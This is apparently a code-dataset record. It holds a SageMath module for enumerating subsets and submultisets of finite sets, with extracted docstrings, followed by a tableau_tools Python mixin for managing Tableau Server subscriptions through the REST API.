r""" Subsets The combinatorial class of the subsets of a finite set. The set can be given as a list or a Set or else as an integer `n` which encodes the set `\{1,2,...,n\}`. See :class:`Subsets` for more information and examples. AUTHORS: - <NAME>: initial version - <NAME> (2009/02/06): doc improvements + new methods """ #***************************************************************************** # Copyright (C) 2007 <NAME> <<EMAIL>>, # # Distributed under the terms of the GNU General Public License (GPL) # # This code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # The full text of the GPL is available at: # # http://www.gnu.org/licenses/ #***************************************************************************** from sage.sets.set import Set from sage.rings.arith import binomial from sage.rings.integer import Integer import sage.combinat.subword as subword import sage.combinat.choose_nk as choose_nk import sage.misc.prandom as rnd import __builtin__ import itertools from combinat import CombinatorialClass from sage.sets.set import Set_object_enumerated from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets def Subsets(s, k=None, submultiset=False): """ Returns the combinatorial class of the subsets of the finite set s. The set can be given as a list, Set or any iterable convertible to a set. It can alternatively be given a non-negative integer `n` which encode the set `\{1,2,\dots,n\}` (i.e. the Sage ``range(1,s+1)``). A second optional parameter k can be given. In this case, Subsets returns the combinatorial class of subsets of s of size k. Finally the option ``submultiset`` allows one to deal with sets with repeated elements usually called multisets. EXAMPLES:: sage: S = Subsets([1, 2, 3]); S Subsets of {1, 2, 3} sage: S.cardinality() 8 sage: S.first() {} sage: S.last() {1, 2, 3} sage: S.random_element() {2} sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] Here is the same example where the set is given as an integer:: sage: S = Subsets(3) sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] We demonstrate various the effect of the various options:: sage: S = Subsets(3, 2); S Subsets of {1, 2, 3} of size 2 sage: S.list() [{1, 2}, {1, 3}, {2, 3}] sage: S = Subsets([1, 2, 2], submultiset=True); S SubMultiset of [1, 2, 2] sage: S.list() [[], [1], [2], [1, 2], [2, 2], [1, 2, 2]] sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 sage: S.list() [[1, 2, 2], [1, 2, 3], [2, 2, 3]] sage: S = Subsets(['a','b','a','b'], 2, submultiset=True); S.list() [['a', 'a'], ['a', 'b'], ['b', 'b']] """ if k is not None: k=Integer(k) if isinstance(s, (int, Integer)): if s < 0: raise ValueError("s must be non-negative") s = Set(range(1,s+1)) # if len(Set(s)) != len(s): # multi = True if k is None: if submultiset: return SubMultiset_s(s) else: return Subsets_s(s) else: if submultiset: return SubMultiset_sk(s, k) else: return Subsets_sk(s, k) class Subsets_s(CombinatorialClass): def __init__(self, s): """ TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets([1,2,3]) sage: TestSuite(S).run(skip=["_test_elements"]) sage: S = sage.sets.set.Set_object_enumerated([1,2]) sage: TestSuite(S).run() # todo: not implemented """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) self.s = Set(s) def __repr__(self): """ TESTS:: sage: repr(Subsets([1,2,3])) 'Subsets of {1, 2, 3}' """ return "Subsets of %s"%self.s def __contains__(self, value): """ TESTS:: sage: S = Subsets([1,2,3]) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S True """ value = Set(value) for v in value: if not v in self.s: return False return True def cardinality(self): r""" Returns the number of subsets of the set s. This is given by `2^{|s|}`. EXAMPLES:: sage: Subsets(Set([1,2,3])).cardinality() 8 sage: Subsets([1,2,3,3]).cardinality() 8 sage: Subsets(3).cardinality() 8 """ return Integer(2**len(self.s)) def first(self): """ Returns the first subset of s. Since we aren't restricted to subsets of a certain size, this is always the empty set. EXAMPLES:: sage: Subsets([1,2,3]).first() {} sage: Subsets(3).first() {} """ return Set([]) def last(self): """ Returns the last subset of s. Since we aren't restricted to subsets of a certain size, this is always the set s itself. EXAMPLES:: sage: Subsets([1,2,3]).last() {1, 2, 3} sage: Subsets(3).last() {1, 2, 3} """ return self.s def __iter__(self): """ Iterates through the subsets of s. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]))] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets(3)] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets([1,2,3,3])] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] """ lset = __builtin__.list(self.s) #We use the iterator for the subwords of range(len(self.s)) ind_set = lambda index_list: Set([lset[i] for i in index_list]) it = itertools.imap(ind_set, subword.Subwords(range(len(lset)))) for sub in it: yield sub def random_element(self): """ Returns a random element of the class of subsets of s (in other words, a random subset of s). EXAMPLES:: sage: Subsets(3).random_element() {2} sage: Subsets([4,5,6]).random_element() {5} """ lset = __builtin__.list(self.s) n = len(self.s) return Set(filter(lambda x: rnd.randint(0,1), lset)) def rank(self, sub): """ Returns the rank of sub as a subset of s. EXAMPLES:: sage: Subsets(3).rank([]) 0 sage: Subsets(3).rank([1,2]) 4 sage: Subsets(3).rank([1,2,3]) 7 sage: Subsets(3).rank([2,3,4]) == None True """ subset = Set(sub) lset = __builtin__.list(self.s) lsubset = __builtin__.list(subset) try: index_list = sorted(map(lambda x: lset.index(x), lsubset)) except ValueError: return None n = len(self.s) r = 0 for i in range(len(index_list)): r += binomial(n,i) return r + choose_nk.rank(index_list,n) def unrank(self, r): """ Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3).unrank(0) {} sage: Subsets([2,4,5]).unrank(1) {2} """ lset = __builtin__.list(self.s) n = len(lset) if r >= self.cardinality() or r < 0: return None else: for k in range(n+1): bin = binomial(n,k) if r >= bin: r = r - bin else: return Set([lset[i] for i in choose_nk.from_rank(r, n, k)]) def _an_element_(self): """ Returns an example of subset. EXAMPLES:: sage: Subsets(0)._an_element_() {} sage: Subsets(3)._an_element_() {1, 2} sage: Subsets([2,4,5])._an_element_() {2, 4} """ return self.unrank(self.cardinality() // 2) def _element_constructor_(self, x): """ TESTS:: sage: S3 = Subsets(3); S3([1,2]) {1, 2} sage: S3([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} """ return Set(x) element_class = Set_object_enumerated class Subsets_sk(CombinatorialClass): def __init__(self, s, k): """ TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets(3,2) sage: TestSuite(S).run(skip=["_test_elements"]) """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) self.s = Set(s) self.k = k def __repr__(self): """ TESTS:: sage: repr(Subsets(3,2)) 'Subsets of {1, 2, 3} of size 2' """ return "Subsets of %s of size %s"%(self.s, self.k) def __contains__(self, value): """ TESTS: sage: S = Subsets([1,2,3], 2) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S False """ value = Set(value) if len(value) != self.k: return False for v in value: if not v in self.s: return False return True def cardinality(self): """ EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).cardinality() 3 sage: Subsets([1,2,3,3], 2).cardinality() 3 sage: Subsets([1,2,3], 1).cardinality() 3 sage: Subsets([1,2,3], 3).cardinality() 1 sage: Subsets([1,2,3], 0).cardinality() 1 sage: Subsets([1,2,3], 4).cardinality() 0 sage: Subsets(3,2).cardinality() 3 sage: Subsets(3,4).cardinality() 0 """ if self.k not in range(len(self.s)+1): return 0 else: return binomial(len(self.s),self.k) def first(self): """ Returns the first subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).first() {1, 2} sage: Subsets([1,2,3,3], 2).first() {1, 2} sage: Subsets(3,2).first() {1, 2} sage: Subsets(3,4).first() """ if self.k not in range(len(self.s)+1): return None else: return Set(__builtin__.list(self.s)[:self.k]) def last(self): """ Returns the last subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).last() {2, 3} sage: Subsets([1,2,3,3], 2).last() {2, 3} sage: Subsets(3,2).last() {2, 3} sage: Subsets(3,4).last() """ if self.k not in range(len(self.s)+1): return None else: return Set(__builtin__.list(self.s)[-self.k:]) def __iter__(self): """ Iterates through the subsets of s of size k. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]), 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets([1,2,3,3], 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets(3,2)] [{1, 2}, {1, 3}, {2, 3}] """ if self.k not in range(len(self.s)+1): return lset = __builtin__.list(self.s) #We use the iterator for the subwords of range(len(self.s)) ind_set = lambda index_list: Set([lset[i] for i in index_list]) for sub in choose_nk.ChooseNK(len(lset),self.k): yield ind_set(sub) def random_element(self): """ Returns a random element of the class of subsets of s of size k (in other words, a random subset of s of size k). EXAMPLES:: sage: Subsets(3, 2).random_element() {1, 2} sage: Subsets(3,4).random_element() is None True """ lset = __builtin__.list(self.s) n = len(self.s) if self.k not in range(len(self.s)+1): return None else: return Set([lset[i] for i in choose_nk.ChooseNK(n, self.k).random_element()]) def rank(self, sub): """ Returns the rank of sub as a subset of s of size k. EXAMPLES:: sage: Subsets(3,2).rank([1,2]) 0 sage: Subsets([2,3,4],2).rank([3,4]) 2 sage: Subsets([2,3,4],2).rank([2]) sage: Subsets([2,3,4],4).rank([2,3,4,5]) """ subset = Set(sub) lset = __builtin__.list(self.s) lsubset = __builtin__.list(subset) try: index_list = sorted(map(lambda x: lset.index(x), lsubset)) except ValueError: return None n = len(self.s) r = 0 if self.k not in range(len(self.s)+1): return None elif self.k != len(subset): return None else: return choose_nk.rank(index_list,n) def unrank(self, r): """ Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3,2).unrank(0) {1, 2} sage: Subsets([2,4,5],2).unrank(0) {2, 4} """ lset = __builtin__.list(self.s) n = len(lset) if self.k not in range(len(self.s)+1): return None elif r >= self.cardinality() or r < 0: return None else: return Set([lset[i] for i in choose_nk.from_rank(r, n, self.k)]) def _an_element_(self): """ Returns an example of subset. EXAMPLES:: sage: Subsets(0,0)._an_element_() {} sage: Subsets(3,2)._an_element_() {1, 3} sage: Subsets([2,4,5],2)._an_element_() {2, 5} """ return self.unrank(self.cardinality() // 2) def _element_constructor_(self, x): """ TESTS:: sage: S32 = Subsets(3,2); S32([1,2]) {1, 2} sage: S32([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} of size 2 """ return Set(x) element_class = Set_object_enumerated class SubMultiset_s(CombinatorialClass): """ The combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S._s [1, 2, 2, 3] The positions of the unique elements in s are stored in:: sage: S._indices [0, 1, 3] and their multiplicities in:: sage: S._multiplicities [1, 2, 1] sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 sage: TestSuite(S).run() """ def __init__(self, s): """ Constructs the combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) s = sorted(list(s)) indices = list(sorted(Set([s.index(a) for a in s]))) multiplicities = [len([a for a in s if a == s[i]]) for i in indices] self._s = s self._indices = indices self._multiplicities = multiplicities def __repr__(self): """ TESTS:: sage: S = Subsets([1, 2, 2, 3], submultiset=True); S SubMultiset of [1, 2, 2, 3] """ return "SubMultiset of %s"%self._s def __contains__(self, s): """ TESTS:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: [] in S True sage: [1, 2, 2] in S True sage: all(i in S for i in S) True sage: [1, 2, 2, 2] in S False sage: [1, 3, 2, 2] in S True sage: [4] in S False """ return sorted(s) in subword.Subwords(self._s) def __iter__(self): """ Iterates through the subsets of the multiset ``self._s``. Note that each subset is represented by a list of its elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S.list() [[], [1], [2], [3], [1, 2], [1, 3], [2, 2], [2, 3], [1, 2, 2], [1, 2, 3], [2, 2, 3], [1, 2, 2, 3]] """ for k in range(len(self._s)+1): for s in SubMultiset_sk(self._s, k): yield s class SubMultiset_sk(SubMultiset_s): """ The combinatorial class of the subsets of size k of a multiset s. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: S._k 2 sage: S.cardinality() 4 sage: S.first() [1, 2] sage: S.last() [3, 3] sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] sage: TestSuite(S).run() """ def __init__(self, s, k): """ TEST:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] """ SubMultiset_s.__init__(self, s) self._k = k def __repr__(self): """ TESTS:: sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 """ return "SubMultiset of %s of size %s"%(self._s, self._k) def __contains__(self, s): """ TESTS:: sage: S = Subsets([1,2,2,3], 2, submultiset=True) sage: [] in S False sage: [1, 2, 2] in S False sage: all(i in S for i in S) True sage: [2, 2] in S True sage: [1, 3] in S True sage: [4] in S False sage: [3, 3] in S False """ return sorted(s) in subword.Subwords(self._s, self._k) def __iter__(self): """ Iterates through the subsets of size ``self._k`` of the multiset ``self._s``. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3],2, submultiset=True) sage: S.list() [[1, 2], [1, 3], [2, 2], [2, 3]] """ from sage.combinat.integer_vector import IntegerVectors for iv in IntegerVectors(self._k, len(self._indices), outer=self._multiplicities): yield sum([ [self._s[self._indices[i]]]*iv[i] for i in range(len(iv))], [])
en
0.609338
Subsets The combinatorial class of the subsets of a finite set. The set can be given as a list or a Set or else as an integer `n` which encodes the set `\{1,2,...,n\}`. See :class:`Subsets` for more information and examples. AUTHORS: - <NAME>: initial version - <NAME> (2009/02/06): doc improvements + new methods #***************************************************************************** # Copyright (C) 2007 <NAME> <<EMAIL>>, # # Distributed under the terms of the GNU General Public License (GPL) # # This code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # The full text of the GPL is available at: # # http://www.gnu.org/licenses/ #***************************************************************************** Returns the combinatorial class of the subsets of the finite set s. The set can be given as a list, Set or any iterable convertible to a set. It can alternatively be given a non-negative integer `n` which encode the set `\{1,2,\dots,n\}` (i.e. the Sage ``range(1,s+1)``). A second optional parameter k can be given. In this case, Subsets returns the combinatorial class of subsets of s of size k. Finally the option ``submultiset`` allows one to deal with sets with repeated elements usually called multisets. EXAMPLES:: sage: S = Subsets([1, 2, 3]); S Subsets of {1, 2, 3} sage: S.cardinality() 8 sage: S.first() {} sage: S.last() {1, 2, 3} sage: S.random_element() {2} sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] Here is the same example where the set is given as an integer:: sage: S = Subsets(3) sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] We demonstrate various the effect of the various options:: sage: S = Subsets(3, 2); S Subsets of {1, 2, 3} of size 2 sage: S.list() [{1, 2}, {1, 3}, {2, 3}] sage: S = Subsets([1, 2, 2], submultiset=True); S SubMultiset of [1, 2, 2] sage: S.list() [[], [1], [2], [1, 2], [2, 2], [1, 2, 2]] sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 sage: S.list() [[1, 2, 2], [1, 2, 3], [2, 2, 3]] sage: S = Subsets(['a','b','a','b'], 2, submultiset=True); S.list() [['a', 'a'], ['a', 'b'], ['b', 'b']] # if len(Set(s)) != len(s): # multi = True TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets([1,2,3]) sage: TestSuite(S).run(skip=["_test_elements"]) sage: S = sage.sets.set.Set_object_enumerated([1,2]) sage: TestSuite(S).run() # todo: not implemented TESTS:: sage: repr(Subsets([1,2,3])) 'Subsets of {1, 2, 3}' TESTS:: sage: S = Subsets([1,2,3]) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S True Returns the number of subsets of the set s. This is given by `2^{|s|}`. EXAMPLES:: sage: Subsets(Set([1,2,3])).cardinality() 8 sage: Subsets([1,2,3,3]).cardinality() 8 sage: Subsets(3).cardinality() 8 Returns the first subset of s. Since we aren't restricted to subsets of a certain size, this is always the empty set. EXAMPLES:: sage: Subsets([1,2,3]).first() {} sage: Subsets(3).first() {} Returns the last subset of s. Since we aren't restricted to subsets of a certain size, this is always the set s itself. EXAMPLES:: sage: Subsets([1,2,3]).last() {1, 2, 3} sage: Subsets(3).last() {1, 2, 3} Iterates through the subsets of s. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]))] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets(3)] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets([1,2,3,3])] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] #We use the iterator for the subwords of range(len(self.s)) Returns a random element of the class of subsets of s (in other words, a random subset of s). EXAMPLES:: sage: Subsets(3).random_element() {2} sage: Subsets([4,5,6]).random_element() {5} Returns the rank of sub as a subset of s. EXAMPLES:: sage: Subsets(3).rank([]) 0 sage: Subsets(3).rank([1,2]) 4 sage: Subsets(3).rank([1,2,3]) 7 sage: Subsets(3).rank([2,3,4]) == None True Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3).unrank(0) {} sage: Subsets([2,4,5]).unrank(1) {2} Returns an example of subset. EXAMPLES:: sage: Subsets(0)._an_element_() {} sage: Subsets(3)._an_element_() {1, 2} sage: Subsets([2,4,5])._an_element_() {2, 4} TESTS:: sage: S3 = Subsets(3); S3([1,2]) {1, 2} sage: S3([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets(3,2) sage: TestSuite(S).run(skip=["_test_elements"]) TESTS:: sage: repr(Subsets(3,2)) 'Subsets of {1, 2, 3} of size 2' TESTS: sage: S = Subsets([1,2,3], 2) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S False EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).cardinality() 3 sage: Subsets([1,2,3,3], 2).cardinality() 3 sage: Subsets([1,2,3], 1).cardinality() 3 sage: Subsets([1,2,3], 3).cardinality() 1 sage: Subsets([1,2,3], 0).cardinality() 1 sage: Subsets([1,2,3], 4).cardinality() 0 sage: Subsets(3,2).cardinality() 3 sage: Subsets(3,4).cardinality() 0 Returns the first subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).first() {1, 2} sage: Subsets([1,2,3,3], 2).first() {1, 2} sage: Subsets(3,2).first() {1, 2} sage: Subsets(3,4).first() Returns the last subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).last() {2, 3} sage: Subsets([1,2,3,3], 2).last() {2, 3} sage: Subsets(3,2).last() {2, 3} sage: Subsets(3,4).last() Iterates through the subsets of s of size k. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]), 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets([1,2,3,3], 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets(3,2)] [{1, 2}, {1, 3}, {2, 3}] #We use the iterator for the subwords of range(len(self.s)) Returns a random element of the class of subsets of s of size k (in other words, a random subset of s of size k). EXAMPLES:: sage: Subsets(3, 2).random_element() {1, 2} sage: Subsets(3,4).random_element() is None True Returns the rank of sub as a subset of s of size k. EXAMPLES:: sage: Subsets(3,2).rank([1,2]) 0 sage: Subsets([2,3,4],2).rank([3,4]) 2 sage: Subsets([2,3,4],2).rank([2]) sage: Subsets([2,3,4],4).rank([2,3,4,5]) Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3,2).unrank(0) {1, 2} sage: Subsets([2,4,5],2).unrank(0) {2, 4} Returns an example of subset. EXAMPLES:: sage: Subsets(0,0)._an_element_() {} sage: Subsets(3,2)._an_element_() {1, 3} sage: Subsets([2,4,5],2)._an_element_() {2, 5} TESTS:: sage: S32 = Subsets(3,2); S32([1,2]) {1, 2} sage: S32([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} of size 2 The combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S._s [1, 2, 2, 3] The positions of the unique elements in s are stored in:: sage: S._indices [0, 1, 3] and their multiplicities in:: sage: S._multiplicities [1, 2, 1] sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 sage: TestSuite(S).run() Constructs the combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 TESTS:: sage: S = Subsets([1, 2, 2, 3], submultiset=True); S SubMultiset of [1, 2, 2, 3] TESTS:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: [] in S True sage: [1, 2, 2] in S True sage: all(i in S for i in S) True sage: [1, 2, 2, 2] in S False sage: [1, 3, 2, 2] in S True sage: [4] in S False Iterates through the subsets of the multiset ``self._s``. Note that each subset is represented by a list of its elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S.list() [[], [1], [2], [3], [1, 2], [1, 3], [2, 2], [2, 3], [1, 2, 2], [1, 2, 3], [2, 2, 3], [1, 2, 2, 3]] The combinatorial class of the subsets of size k of a multiset s. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: S._k 2 sage: S.cardinality() 4 sage: S.first() [1, 2] sage: S.last() [3, 3] sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] sage: TestSuite(S).run() TEST:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] TESTS:: sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 TESTS:: sage: S = Subsets([1,2,2,3], 2, submultiset=True) sage: [] in S False sage: [1, 2, 2] in S False sage: all(i in S for i in S) True sage: [2, 2] in S True sage: [1, 3] in S True sage: [4] in S False sage: [3, 3] in S False Iterates through the subsets of size ``self._k`` of the multiset ``self._s``. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3],2, submultiset=True) sage: S.list() [[1, 2], [1, 3], [2, 2], [2, 3]]
3.062224
3
tableau_rest_api/methods/subscription.py
Kamran-ov/tableau_tools
0
6627893
from requests.exceptions import HTTPError from .rest_api_base import * class SubscriptionMethods(): def __init__(self, rest_api_base: TableauRestApiBase): self.rest_api_base = rest_api_base def __getattr__(self, attr): return getattr(self.rest_api_base, attr) def query_subscriptions(self, username_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None) -> ET.Element: self.start_log_block() subscriptions = self.query_resource('subscriptions') filters_dict = {} if subscription_subject is not None: filters_dict['subject'] = '[@subject="{}"]'.format(subscription_subject) if schedule_name_or_luid is not None: if self.is_luid(schedule_name_or_luid): filters_dict['sched'] = 'schedule[@id="{}"'.format(schedule_name_or_luid) else: filters_dict['sched'] = 'schedule[@user="{}"'.format(schedule_name_or_luid) if username_or_luid is not None: if self.is_luid(username_or_luid): filters_dict['user'] = 'user[@id="{}"]'.format(username_or_luid) else: filters_dict['user'] = 'user[@name="{}"]'.format(username_or_luid) if view_or_workbook is not None: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") # Does this search make sense my itself? if content_name_or_luid is not None: if self.is_luid(content_name_or_luid): filters_dict['content_luid'] = 'content[@id="{}"'.format(content_name_or_luid) else: if view_or_workbook is None: raise InvalidOptionException('view_or_workbook must be specified for content: "Workbook" or "View"') if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid) elif view_or_workbook == 'Workbook': content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid) filters_dict['content_luid'] = 'content[@id="{}"'.format(content_luid) if 'subject' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription{}'.format(filters_dict['subject']), self.ns_map) if 'user' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['user']), self.ns_map) if 'sched' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['sched']), self.ns_map) if 'content_luid' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['content_luid']), self.ns_map) self.end_log_block() return subscriptions def create_subscription(self, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, username_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None, direct_xml_request: Optional[ET.Element] = None) -> str: self.start_log_block() if direct_xml_request is not None: tsr = direct_xml_request else: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") user_luid = self.query_user_luid(username_or_luid) schedule_luid = self.query_schedule_luid(schedule_name_or_luid) if self.is_luid(content_name_or_luid): content_luid = content_name_or_luid else: if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid, username_or_luid=user_luid) elif view_or_workbook == 'Workbook': content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid, user_luid) else: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") tsr = ET.Element('tsRequest') s = ET.Element('subscription') s.set('subject', subscription_subject) c = ET.Element('content') c.set('type', view_or_workbook) c.set('id', content_luid) sch = ET.Element('schedule') sch.set('id', schedule_luid) u = ET.Element('user') u.set('id', user_luid) s.append(c) s.append(sch) s.append(u) tsr.append(s) url = self.build_api_url('subscriptions') try: new_subscription = self.send_add_request(url, tsr) new_subscription_luid = new_subscription.findall('.//t:subscription', self.ns_map)[0].get("id") self.end_log_block() return new_subscription_luid except RecoverableHTTPException as e: self.end_log_block() raise e except HTTPError as e: self.end_log_block() raise InvalidOptionException('Please check to make sure that you have an SMTP server configured and Subscriptions are enabled for this Server and Site') def create_subscription_to_workbook(self, subscription_subject: str, wb_name_or_luid: str, schedule_name_or_luid: str, username_or_luid: str, project_name_or_luid: Optional[str] = None) -> str: self.start_log_block() luid = self.create_subscription(subscription_subject=subscription_subject, view_or_workbook='Workbook', content_name_or_luid=wb_name_or_luid, schedule_name_or_luid=schedule_name_or_luid, username_or_luid=username_or_luid, project_name_or_luid=project_name_or_luid) self.end_log_block() return luid def create_subscription_to_view(self, subscription_subject: str, view_name_or_luid: str, schedule_name_or_luid: str, username_or_luid: str, wb_name_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None) -> str: self.start_log_block() luid = self.create_subscription(subscription_subject=subscription_subject, view_or_workbook='View', content_name_or_luid=view_name_or_luid, schedule_name_or_luid=schedule_name_or_luid, username_or_luid=username_or_luid, wb_name_or_luid=wb_name_or_luid, project_name_or_luid=project_name_or_luid) self.end_log_block() return luid def update_subscription(self, subscription_luid: str, subject: Optional[str] = None, schedule_luid: Optional[str] = None) -> ET.Element: if subject is None and schedule_luid is None: raise InvalidOptionException("You must pass one of subject or schedule_luid, or both") tsr = ET.Element('tsRequest') s = ET.Element('subscription') if subject is not None: s.set('subject', subject) if schedule_luid is not None: sch = ET.Element('schedule') sch.set('id', schedule_luid) s.append(sch) tsr.append(s) url = self.build_api_url("subscriptions/{}".format(subscription_luid)) response = self.send_update_request(url, tsr) self.end_log_block() return response def delete_subscriptions(self, subscription_luid_s: Union[List[str], str]): self.start_log_block() subscription_luids = self.to_list(subscription_luid_s) for subscription_luid in subscription_luids: url = self.build_api_url("subscriptions/{}".format(subscription_luid)) self.send_delete_request(url) self.end_log_block() class 